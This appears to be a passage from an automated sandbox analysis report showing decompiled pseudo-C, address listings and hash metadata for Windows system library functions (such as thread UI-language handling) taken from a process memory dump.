                                                                      												_t256 = E00A06600( *(_t312 + 0x1c));
                                                                      												__eflags = _t256;
                                                                      												if(_t256 != 0) {
                                                                      													goto L106;
                                                                      												} else {
                                                                      													_t295 = _a4;
                                                                      													goto L75;
                                                                      												}
                                                                      											}
                                                                      										} else {
                                                                      											L75:
                                                                      											_t331 = E00A22C50(_t295, _a8, _t286, _a16, _a20, _a24, _t324);
                                                                      											L76:
                                                                      											_v32 = _t331;
                                                                      											goto L69;
                                                                      										}
                                                                      									}
                                                                      									goto L108;
                                                                      								} else {
                                                                      									E00A0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      									_v8 = 1;
                                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                      									_t331 = _a24;
                                                                      									_t263 = E00A22AE4( &_v36, _a8, _t286, _a16, _a20, _t331);
                                                                      									_v32 = _t263;
                                                                      									__eflags = _t263 - 0xc0000100;
                                                                      									if(_t263 == 0xc0000100) {
                                                                      										_v32 = E00A22C50(_v36, _a8, _t286, _a16, _a20, _t331, 1);
                                                                      									}
                                                                      									_v8 = _t324;
                                                                      									E00A22ACB();
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L69:
                                                                      						_v8 = 0xfffffffe;
                                                                      						_t249 = _t331;
                                                                      					}
                                                                      					L70:
                                                                      					return E00A4D0D1(_t249);
                                                                      				}
                                                                      				L108:
                                                                      			}

                                                                      0x00a65be4
                                                                      0x00a65be6
                                                                      0x00a65be8
                                                                      0x00a65be9
                                                                      0x00a65bee
                                                                      0x00a65bf8
                                                                      0x00a65bff
                                                                      0x00a65c01
                                                                      0x00a65c04
                                                                      0x00a65c07
                                                                      0x00a65c0b
                                                                      0x00a65c0d
                                                                      0x00a65c0d
                                                                      0x00a65c15
                                                                      0x00a65c18
                                                                      0x00a65c1b
                                                                      0x00a65c1b
                                                                      0x00a65c1e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a228c3
                                                                      0x00a228c8
                                                                      0x00a228d2
                                                                      0x00a228d4
                                                                      0x00a228d8
                                                                      0x00a228db
                                                                      0x00a65c26
                                                                      0x00a65c28
                                                                      0x00a65c2d
                                                                      0x00a65c2d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65c34
                                                                      0x00a65c36
                                                                      0x00a65c49
                                                                      0x00a65c4e
                                                                      0x00a65c54
                                                                      0x00a65c5b
                                                                      0x00a65c5d
                                                                      0x00a65c60
                                                                      0x00a22788
                                                                      0x00a22788
                                                                      0x00a2278b
                                                                      0x00a2278e
                                                                      0x00a2278e
                                                                      0x00a2278e
                                                                      0x00a22791
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22756
                                                                      0x00a22750
                                                                      0x00000000
                                                                      0x00a22794
                                                                      0x00a22794
                                                                      0x00a22795
                                                                      0x00a22798
                                                                      0x00a22798
                                                                      0x00000000
                                                                      0x00a22734
                                                                      0x00a2272c
                                                                      0x00a22700
                                                                      0x00a225ef
                                                                      0x00a225ef
                                                                      0x00a225ef
                                                                      0x00a225f2
                                                                      0x00a225f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a225fe
                                                                      0x00000000
                                                                      0x00a228e6
                                                                      0x00a228ec
                                                                      0x00a228ef
                                                                      0x00a228f5
                                                                      0x00a228f8
                                                                      0x00a228f8
                                                                      0x00000000
                                                                      0x00a228f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22866
                                                                      0x00a22866
                                                                      0x00a22876
                                                                      0x00a22879
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a227e0
                                                                      0x00a227e7
                                                                      0x00a227e9
                                                                      0x00a227eb
                                                                      0x00a65afd
                                                                      0x00000000
                                                                      0x00a65afd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22633
                                                                      0x00a22638
                                                                      0x00a2263b
                                                                      0x00a2263c
                                                                      0x00a2263e
                                                                      0x00a22640
                                                                      0x00a22642
                                                                      0x00a22647
                                                                      0x00a22649
                                                                      0x00a2264e
                                                                      0x00a22650
                                                                      0x00a22653
                                                                      0x00a22659
                                                                      0x00a226a2
                                                                      0x00a226a7
                                                                      0x00a226ac
                                                                      0x00a226b2
                                                                      0x00a65b11
                                                                      0x00a65b15
                                                                      0x00a65b17
                                                                      0x00000000
                                                                      0x00a226b8
                                                                      0x00a226b8
                                                                      0x00a226ba
                                                                      0x00a227a6
                                                                      0x00a227a6
                                                                      0x00a227a9
                                                                      0x00a227ab
                                                                      0x00a227b9
                                                                      0x00a227b9
                                                                      0x00a227be
                                                                      0x00a227c1
                                                                      0x00a227c3
                                                                      0x00a227c5
                                                                      0x00a227c7
                                                                      0x00a65c74
                                                                      0x00a65c79
                                                                      0x00a65c79
                                                                      0x00a227c7
                                                                      0x00000000
                                                                      0x00a226c0
                                                                      0x00a226c0
                                                                      0x00a226c3
                                                                      0x00a226c6
                                                                      0x00a226c6
                                                                      0x00a226c9
                                                                      0x00a226c9
                                                                      0x00000000
                                                                      0x00a226c9
                                                                      0x00a226ba
                                                                      0x00a2265b
                                                                      0x00a2265b
                                                                      0x00a2265e
                                                                      0x00a22667
                                                                      0x00a2266d
                                                                      0x00a22677
                                                                      0x00a2267c
                                                                      0x00a2267f
                                                                      0x00a22681
                                                                      0x00a65b49
                                                                      0x00a65b4e
                                                                      0x00a227cd
                                                                      0x00a227d0
                                                                      0x00a227d1
                                                                      0x00a227d2
                                                                      0x00a227d4
                                                                      0x00a227dd
                                                                      0x00a22687
                                                                      0x00a22687
                                                                      0x00a2268a
                                                                      0x00a2268b
                                                                      0x00a2268e
                                                                      0x00a2268f
                                                                      0x00a22691
                                                                      0x00a22696
                                                                      0x00a22698
                                                                      0x00a2269d
                                                                      0x00a2269f
                                                                      0x00000000
                                                                      0x00a2269f
                                                                      0x00a22681
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22846
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22605
                                                                      0x00a2260a
                                                                      0x00a2260c
                                                                      0x00a22611
                                                                      0x00a22616
                                                                      0x00a22619
                                                                      0x00a22619
                                                                      0x00a2261e
                                                                      0x00000000
                                                                      0x00a22624
                                                                      0x00a22627
                                                                      0x00a22627
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65b1f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a22894
                                                                      0x00a2289b
                                                                      0x00a2289d
                                                                      0x00a228a1
                                                                      0x00a65b2b
                                                                      0x00a65b2e
                                                                      0x00a65b2e
                                                                      0x00a228a7
                                                                      0x00a228a9
                                                                      0x00a65b04
                                                                      0x00a65b09
                                                                      0x00a65b09
                                                                      0x00a65b09
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a65b35
                                                                      0x00a65b3c
                                                                      0x00a228fb
                                                                      0x00a228fb
                                                                      0x00a226cc
                                                                      0x00a226cc
                                                                      0x00a226d0
                                                                      0x00000000
                                                                      0x00a226d2
                                                                      0x00a226d2
                                                                      0x00000000
                                                                      0x00a226d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a225fe
                                                                      0x00a2292d
                                                                      0x00a2292f
                                                                      0x00a22930
                                                                      0x00a22935
                                                                      0x00a22937
                                                                      0x00a2293c
                                                                      0x00a2293e
                                                                      0x00a2293f
                                                                      0x00a22944
                                                                      0x00a22947
                                                                      0x00a2294c
                                                                      0x00a2294e
                                                                      0x00a2294f
                                                                      0x00a22950
                                                                      0x00a22957
                                                                      0x00a22958
                                                                      0x00a2295a
                                                                      0x00a22962
                                                                      0x00a22963
                                                                      0x00a22968
                                                                      0x00a2296b
                                                                      0x00a22972
                                                                      0x00a22973
                                                                      0x00a22974
                                                                      0x00a2297b
                                                                      0x00a2297e
                                                                      0x00a2297f
                                                                      0x00a22980
                                                                      0x00a22981
                                                                      0x00a22982
                                                                      0x00a22983
                                                                      0x00a22984
                                                                      0x00a22985
                                                                      0x00a22986
                                                                      0x00a22987
                                                                      0x00a22988
                                                                      0x00a22989
                                                                      0x00a2298a
                                                                      0x00a2298b
                                                                      0x00a2298c
                                                                      0x00a2298d
                                                                      0x00a2298e
                                                                      0x00a2298f
                                                                      0x00a22990
                                                                      0x00a22992
                                                                      0x00a22997
                                                                      0x00a229a3
                                                                      0x00a229a6
                                                                      0x00a229ab
                                                                      0x00a229ad
                                                                      0x00a229b0
                                                                      0x00a229b2
                                                                      0x00a65c80
                                                                      0x00a229b8
                                                                      0x00a229b8
                                                                      0x00a229bb
                                                                      0x00a229c0
                                                                      0x00a229c5
                                                                      0x00a229c6
                                                                      0x00a229c6
                                                                      0x00a229c9
                                                                      0x00a229cb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a229cd
                                                                      0x00a229d0
                                                                      0x00a229d9
                                                                      0x00a229db
                                                                      0x00a229dd
                                                                      0x00a22a7f
                                                                      0x00a22a84
                                                                      0x00a22a87
                                                                      0x00a22a89
                                                                      0x00a65ca1
                                                                      0x00a65ca3
                                                                      0x00000000
                                                                      0x00a22a8f
                                                                      0x00a22a8f
                                                                      0x00000000
                                                                      0x00a22a8f
                                                                      0x00000000
                                                                      0x00a229e3
                                                                      0x00a229e3
                                                                      0x00a229e3
                                                                      0x00000000
                                                                      0x00a229e3
                                                                      0x00a229dd
                                                                      0x00000000
                                                                      0x00a229db
                                                                      0x00a229e6
                                                                      0x00a229e9
                                                                      0x00a229eb
                                                                      0x00a229ed
                                                                      0x00a229f3
                                                                      0x00a229f5
                                                                      0x00a229f8
                                                                      0x00a229fa
                                                                      0x00a22a97
                                                                      0x00a22a9a
                                                                      0x00a22a9d
                                                                      0x00a22add
                                                                      0x00000000
                                                                      0x00a22a9f
                                                                      0x00a22aa2
                                                                      0x00a22aa5
                                                                      0x00a22aa8
                                                                      0x00a22aab
                                                                      0x00a65cab
                                                                      0x00a65caf
                                                                      0x00a65cc5
                                                                      0x00a65cda
                                                                      0x00a65cdc
                                                                      0x00a65cdf
                                                                      0x00a65ce5
                                                                      0x00000000
                                                                      0x00a65ceb
                                                                      0x00a65ced
                                                                      0x00a65cee

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PATH
                                                                      • API String ID: 0-1036084923
                                                                      • Opcode ID: dca4e201fe185f24d81b71e81bad042a51e8a891e97643b5328c3ca8eb4bd5ac
                                                                      • Instruction ID: 9598777972d0f44cbeb8900a3af7bd4805fa0a4eafe3336e5e850302caf8acec
                                                                      • Opcode Fuzzy Hash: dca4e201fe185f24d81b71e81bad042a51e8a891e97643b5328c3ca8eb4bd5ac
                                                                      • Instruction Fuzzy Hash: 55C16F72E04229AFCB25DFADE981BADB7B5FF48700F144029F415AB2A0D734A941DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00A2FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                      				char _v5;
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				char _v16;
                                                                      				char _v17;
                                                                      				char _v20;
                                                                      				signed int _v24;
                                                                      				char _v28;
                                                                      				char _v32;
                                                                      				signed int _v40;
                                                                      				void* __ecx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				signed int _t73;
                                                                      				intOrPtr* _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t79;
                                                                      				signed int _t81;
                                                                      				intOrPtr _t83;
                                                                      				intOrPtr _t85;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t91;
                                                                      				signed int _t94;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t106;
                                                                      				signed int _t108;
                                                                      				signed int _t114;
                                                                      				signed int _t116;
                                                                      				signed int _t118;
                                                                      				signed int _t122;
                                                                      				signed int _t123;
                                                                      				void* _t129;
                                                                      				signed int _t130;
                                                                      				void* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				signed int _t138;
                                                                      				signed int _t141;
                                                                      				signed int _t147;
                                                                      				intOrPtr _t153;
                                                                      				signed int _t154;
                                                                      				signed int _t155;
                                                                      				signed int _t170;
                                                                      				void* _t174;
                                                                      				signed int _t176;
                                                                      				signed int _t177;
                                                                      
                                                                      				_t129 = __ebx;
                                                                      				_push(_t132);
                                                                      				_push(__esi);
                                                                      				_t174 = _t132;
                                                                      				_t73 =  !( *( *(_t174 + 0x18)));
                                                                      				if(_t73 >= 0) {
                                                                      					L5:
                                                                      					return _t73;
                                                                      				} else {
                                                                      					E00A0EEF0(0xae7b60);
                                                                      					_t134 =  *0xae7b84; // 0x77f07b80
                                                                      					_t2 = _t174 + 0x24; // 0x24
                                                                      					_t75 = _t2;
                                                                      					if( *_t134 != 0xae7b80) {
                                                                      						_push(3);
                                                                      						asm("int 0x29");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						asm("int3");
                                                                      						_push(0xae7b60);
                                                                      						_t170 = _v8;
                                                                      						_v28 = 0;
                                                                      						_v40 = 0;
                                                                      						_v24 = 0;
                                                                      						_v17 = 0;
                                                                      						_v32 = 0;
                                                                      						__eflags = _t170 & 0xffff7cf2;
                                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                                      							L43:
                                                                      							_t77 = 0xc000000d;
                                                                      						} else {
                                                                      							_t79 = _t170 & 0x0000000c;
                                                                      							__eflags = _t79;
                                                                      							if(_t79 != 0) {
                                                                      								__eflags = _t79 - 0xc;
                                                                      								if(_t79 == 0xc) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									goto L9;
                                                                      								}
                                                                      							} else {
                                                                      								_t170 = _t170 | 0x00000008;
                                                                      								__eflags = _t170;
                                                                      								L9:
                                                                      								_t81 = _t170 & 0x00000300;
                                                                      								__eflags = _t81 - 0x300;
                                                                      								if(_t81 == 0x300) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									_t138 = _t170 & 0x00000001;
                                                                      									__eflags = _t138;
                                                                      									_v24 = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										__eflags = _t81;
                                                                      										if(_t81 != 0) {
                                                                      											goto L43;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										L11:
                                                                      										_push(_t129);
                                                                      										_t77 = E00A06D90( &_v20);
                                                                      										_t130 = _t77;
                                                                      										__eflags = _t130;
                                                                      										if(_t130 >= 0) {
                                                                      											_push(_t174);
                                                                      											__eflags = _t170 & 0x00000301;
                                                                      											if((_t170 & 0x00000301) == 0) {
                                                                      												_t176 = _a8;
                                                                      												__eflags = _t176;
                                                                      												if(__eflags == 0) {
                                                                      													L64:
                                                                      													_t83 =  *[fs:0x18];
                                                                      													_t177 = 0;
                                                                      													__eflags =  *(_t83 + 0xfb8);
                                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                                      														E00A076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                      													}
                                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													asm("sbb edx, edx");
                                                                      													_t114 = E00A98938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                      													__eflags = _t114;
                                                                      													if(_t114 < 0) {
                                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                      														E009FB150();
                                                                      													}
                                                                      													_t116 = E00A96D81(_t176,  &_v16);
                                                                      													__eflags = _t116;
                                                                      													if(_t116 >= 0) {
                                                                      														__eflags = _v16 - 2;
                                                                      														if(_v16 < 2) {
                                                                      															L56:
                                                                      															_t118 = E00A075CE(_v20, 5, 0);
                                                                      															__eflags = _t118;
                                                                      															if(_t118 < 0) {
                                                                      																L67:
                                                                      																_t130 = 0xc0000017;
                                                                      																goto L32;
                                                                      															} else {
                                                                      																__eflags = _v12;
                                                                      																if(_v12 == 0) {
                                                                      																	goto L67;
                                                                      																} else {
                                                                      																	_t153 =  *0xae8638; // 0x0
                                                                      																	_t122 = L00A038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                      																	_t154 = _v12;
                                                                      																	_t130 = _t122;
                                                                      																	__eflags = _t130;
                                                                      																	if(_t130 >= 0) {
                                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                      																		__eflags = _t123;
                                                                      																		if(_t123 != 0) {
                                                                      																			_t155 = _a12;
                                                                      																			__eflags = _t155;
                                                                      																			if(_t155 != 0) {
                                                                      																				 *_t155 = _t123;
                                                                      																			}
                                                                      																			goto L64;
                                                                      																		} else {
                                                                      																			E00A076E2(_t154);
                                                                      																			goto L41;
                                                                      																		}
                                                                      																	} else {
                                                                      																		E00A076E2(_t154);
                                                                      																		_t177 = 0;
                                                                      																		goto L18;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															__eflags =  *_t176;
                                                                      															if( *_t176 != 0) {
                                                                      																goto L56;
                                                                      															} else {
                                                                      																__eflags =  *(_t176 + 2);
                                                                      																if( *(_t176 + 2) == 0) {
                                                                      																	goto L64;
                                                                      																} else {
                                                                      																	goto L56;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t130 = 0xc000000d;
                                                                      														goto L32;
                                                                      													}
                                                                      												}
                                                                      												goto L35;
                                                                      											} else {
                                                                      												__eflags = _a8;
                                                                      												if(_a8 != 0) {
                                                                      													_t77 = 0xc000000d;
                                                                      												} else {
                                                                      													_v5 = 1;
                                                                      													L00A2FCE3(_v20, _t170);
                                                                      													_t177 = 0;
                                                                      													__eflags = 0;
                                                                      													L15:
                                                                      													_t85 =  *[fs:0x18];
                                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                      														L18:
                                                                      														__eflags = _t130;
                                                                      														if(_t130 != 0) {
                                                                      															goto L32;
                                                                      														} else {
                                                                      															__eflags = _v5 - _t130;
                                                                      															if(_v5 == _t130) {
                                                                      																goto L32;
                                                                      															} else {
                                                                      																_t86 =  *[fs:0x18];
                                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                      																}
                                                                      																__eflags = _t177;
                                                                      																if(_t177 == 0) {
                                                                      																	L31:
                                                                      																	__eflags = 0;
                                                                      																	L00A070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                      																	goto L32;
                                                                      																} else {
                                                                      																	__eflags = _v24;
                                                                      																	_t91 =  *(_t177 + 0x20);
                                                                      																	if(_v24 != 0) {
                                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                      																		goto L31;
                                                                      																	} else {
                                                                      																		_t141 = _t91 & 0x00000040;
                                                                      																		__eflags = _t170 & 0x00000100;
                                                                      																		if((_t170 & 0x00000100) == 0) {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 == 0) {
                                                                      																				L74:
                                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                      																				goto L27;
                                                                      																			} else {
                                                                      																				_t177 = E00A2FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					goto L42;
                                                                      																				} else {
                                                                      																					_t130 = E00A2FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						_t68 = _t177 + 0x20;
                                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						__eflags =  *_t68;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L74;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																			goto L35;
                                                                      																		} else {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 != 0) {
                                                                      																				_t177 = E00A2FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					L42:
                                                                      																					_t77 = 0xc0000001;
                                                                      																					goto L33;
                                                                      																				} else {
                                                                      																					_t130 = E00A2FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L26;
                                                                      																					}
                                                                      																				}
                                                                      																				goto L35;
                                                                      																			} else {
                                                                      																				L26:
                                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                      																				__eflags = _t94;
                                                                      																				L27:
                                                                      																				 *(_t177 + 0x20) = _t94;
                                                                      																				__eflags = _t170 & 0x00008000;
                                                                      																				if((_t170 & 0x00008000) != 0) {
                                                                      																					_t95 = _a12;
                                                                      																					__eflags = _t95;
                                                                      																					if(_t95 != 0) {
                                                                      																						_t96 =  *_t95;
                                                                      																						__eflags = _t96;
                                                                      																						if(_t96 != 0) {
                                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                                      																							_t40 = _t177 + 0x20;
                                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                      																							__eflags =  *_t40;
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				goto L31;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                      														_t106 =  *(_t147 + 0x20);
                                                                      														__eflags = _t106 & 0x00000040;
                                                                      														if((_t106 & 0x00000040) != 0) {
                                                                      															_t147 = E00A2FD22(_t147);
                                                                      															__eflags = _t147;
                                                                      															if(_t147 == 0) {
                                                                      																L41:
                                                                      																_t130 = 0xc0000001;
                                                                      																L32:
                                                                      																_t77 = _t130;
                                                                      																goto L33;
                                                                      															} else {
                                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                      																_t106 =  *(_t147 + 0x20);
                                                                      																goto L17;
                                                                      															}
                                                                      															goto L35;
                                                                      														} else {
                                                                      															L17:
                                                                      															_t108 = _t106 | 0x00000080;
                                                                      															__eflags = _t108;
                                                                      															 *(_t147 + 0x20) = _t108;
                                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                      															goto L18;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											L33:
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L35:
                                                                      						return _t77;
                                                                      					} else {
                                                                      						 *_t75 = 0xae7b80;
                                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                      						 *_t134 = _t75;
                                                                      						 *0xae7b84 = _t75;
                                                                      						_t73 = E00A0EB70(_t134, 0xae7b60);
                                                                      						if( *0xae7b20 != 0) {
                                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                      								_t73 = E00A0FF60( *0xae7b20);
                                                                      							}
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

















































                                                                      0x00000000
                                                                      0x00a2fbe4
                                                                      0x00a2fbe4
                                                                      0x00a2fbe4
                                                                      0x00a2fbe4
                                                                      0x00a2fbe9
                                                                      0x00a2fbf2
                                                                      0x00000000
                                                                      0x00a2fbf2
                                                                      0x00a2fbde
                                                                      0x00a2fbcb
                                                                      0x00a2fbab
                                                                      0x00a2fc8b
                                                                      0x00a2fc8b
                                                                      0x00a2fc8c
                                                                      0x00a2fb80
                                                                      0x00a2fb72
                                                                      0x00a2fb5e
                                                                      0x00a2fc8d
                                                                      0x00a2fc91
                                                                      0x00a2fadf
                                                                      0x00a2fadf
                                                                      0x00a2fae1
                                                                      0x00a2fae4
                                                                      0x00a2fae7
                                                                      0x00a2faec
                                                                      0x00a2faf8
                                                                      0x00a2fb00
                                                                      0x00a2fb07
                                                                      0x00a2fb0f
                                                                      0x00a2fb0f
                                                                      0x00a2fb07
                                                                      0x00000000
                                                                      0x00a2faf8
                                                                      0x00a2fadd

                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00A6BE0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: e76d39afb589a9bf9c86bb25e9cd8720c083aebc838a8f96cdba42b105c875da
                                                                      • Instruction ID: e2a8be74bb1f81f2ea4bac4808596ca5c626c2d4d501951537675534253461dc
                                                                      • Opcode Fuzzy Hash: e76d39afb589a9bf9c86bb25e9cd8720c083aebc838a8f96cdba42b105c875da
                                                                      • Instruction Fuzzy Hash: 28A1EF71B0062ACFDB25DB6CD950BBAB3B5AF48710F14457AE906DB691EB30DC41CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 63%
                                                                      			E009F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                      				signed char _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				signed int _v52;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t55;
                                                                      				signed int _t57;
                                                                      				signed int _t58;
                                                                      				char* _t62;
                                                                      				signed char* _t63;
                                                                      				signed char* _t64;
                                                                      				signed int _t67;
                                                                      				signed int _t72;
                                                                      				signed int _t77;
                                                                      				signed int _t78;
                                                                      				signed int _t88;
                                                                      				intOrPtr _t89;
                                                                      				signed char _t93;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t102;
                                                                      				signed int _t103;
                                                                      				intOrPtr _t104;
                                                                      				signed int _t105;
                                                                      				signed int _t106;
                                                                      				signed char _t109;
                                                                      				signed int _t111;
                                                                      				void* _t116;
                                                                      
                                                                      				_t102 = __edi;
                                                                      				_t97 = __edx;
                                                                      				_v12 = _v12 & 0x00000000;
                                                                      				_t55 =  *[fs:0x18];
                                                                      				_t109 = __ecx;
                                                                      				_v8 = __edx;
                                                                      				_t86 = 0;
                                                                      				_v32 = _t55;
                                                                      				_v24 = 0;
                                                                      				_push(__edi);
                                                                      				if(__ecx == 0xae5350) {
                                                                      					_t86 = 1;
                                                                      					_v24 = 1;
                                                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                      				}
                                                                      				_t103 = _t102 | 0xffffffff;
                                                                      				if( *0xae7bc8 != 0) {
                                                                      					_push(0xc000004b);
                                                                      					_push(_t103);
                                                                      					E00A397C0();
                                                                      				}
                                                                      				if( *0xae79c4 != 0) {
                                                                      					_t57 = 0;
                                                                      				} else {
                                                                      					_t57 = 0xae79c8;
                                                                      				}
                                                                      				_v16 = _t57;
                                                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                      					_t93 = _t109;
                                                                      					L23();
                                                                      				}
                                                                      				_t58 =  *_t109;
                                                                      				if(_t58 == _t103) {
                                                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                                      					_t58 = _t103;
                                                                      					if(__eflags == 0) {
                                                                      						_t93 = _t109;
                                                                      						E00A21624(_t86, __eflags);
                                                                      						_t58 =  *_t109;
                                                                      					}
                                                                      				}
                                                                      				_v20 = _v20 & 0x00000000;
                                                                      				if(_t58 != _t103) {
                                                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                      				}
                                                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                      				_t88 = _v16;
                                                                      				_v28 = _t104;
                                                                      				L9:
                                                                      				while(1) {
                                                                      					if(E00A17D50() != 0) {
                                                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                      					} else {
                                                                      						_t62 = 0x7ffe0382;
                                                                      					}
                                                                      					if( *_t62 != 0) {
                                                                      						_t63 =  *[fs:0x30];
                                                                      						__eflags = _t63[0x240] & 0x00000002;
                                                                      						if((_t63[0x240] & 0x00000002) != 0) {
                                                                      							_t93 = _t109;
                                                                      							E00A8FE87(_t93);
                                                                      						}
                                                                      					}
                                                                      					if(_t104 != 0xffffffff) {
                                                                      						_push(_t88);
                                                                      						_push(0);
                                                                      						_push(_t104);
                                                                      						_t64 = E00A39520();
                                                                      						goto L15;
                                                                      					} else {
                                                                      						while(1) {
                                                                      							_t97 =  &_v8;
